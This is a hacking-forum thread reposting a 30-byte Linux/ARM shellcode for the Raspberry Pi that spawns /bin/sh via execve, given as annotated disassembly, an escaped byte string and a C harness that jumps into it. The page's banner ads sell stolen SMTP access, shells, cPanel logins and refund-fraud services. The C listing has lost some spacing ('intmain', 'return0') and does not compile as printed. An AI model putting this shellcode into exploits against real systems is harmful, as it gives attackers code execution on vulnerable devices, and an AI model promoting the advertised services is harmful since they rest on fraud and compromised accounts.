Login Register






SMTPMart - Buy Inbox SMTP | Leads | Shell | cPanel 100% Bonus on 1st deposit | Instant Refunds
ProxyByte $2/GB | Residential IPv4 - No Logs - 26M+ IPs - All unblocked
REFUNDING.GG | #1 REFUND SERVICE | SAME DAY REFUNDS | WORLDWIDE ORDERS | GET ITEMS 85% OFF
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


[Exploit Shellcode] [Raspberry Pi] Linux/ARM - execve("/bin/sh", [0], [0 vars]) filter_list
Author
Message
Stricker Offline
Member
Twelve Years of Service
Posts: 203
Threads: 78
Reputation: 0

Points: 0NSP
[Exploit Shellcode] [Raspberry Pi] Linux/ARM - execve("/bin/sh", [0], [0 vars]) 10-23-2012, 02:42 PM #1
[Raspberry Pi] Linux/ARM - execve("/bin/sh", [0], [0 vars]) -
30 bytes

Code:
/*
Title: Linux/ARM-execve("/bin/
sh",[0],[0vars])-30bytes
Date: 2012-09-08
Testedon:ARM1176JZF-S(v6l)
Author: midnitesnake
####################################

00008054<_start>:
8054: e28f6001
add r6,pc,#1
8058: e12fff16
bx r6
805c: 4678
mov r0,pc
805e: 300a
adds r0,#10
8060: 9001
str r0,[sp,#4]
8062: a901
add r1,sp,#4
8064: 1a92
subs r2,r2,r2
8066: 270b
movs r7,#11
8068: df01
svc 1
806a:
2f2f .short 0x2f2f
806c:
2f6e6962 .word 0x2f6e6962
8070:
00006873 .word 0x00006873
*/
#include<stdio.h>
char*SC= "\x01\x60\x8f\xe2"
"\x16\xff\x2f\xe1"
"\x78\x46"
"\x0a\x30"
"\x01\x90"
"\x01\xa9"
"\x92\x1a"
"\x0b\x27"
"\x01\xdf"
"\x2f\x2f"
"\x62\x69"
"\x6e\x2f"
"\x73\x68\x00\x00";
intmain(void)
{
fprintf(stdout,"Length:%d
\n",strlen(SC));
(*(void(*)())SC)();
return0;
}
[Image: deceptionorangeoverlay.png]

Reply







Users browsing this thread: 1 Guest(s)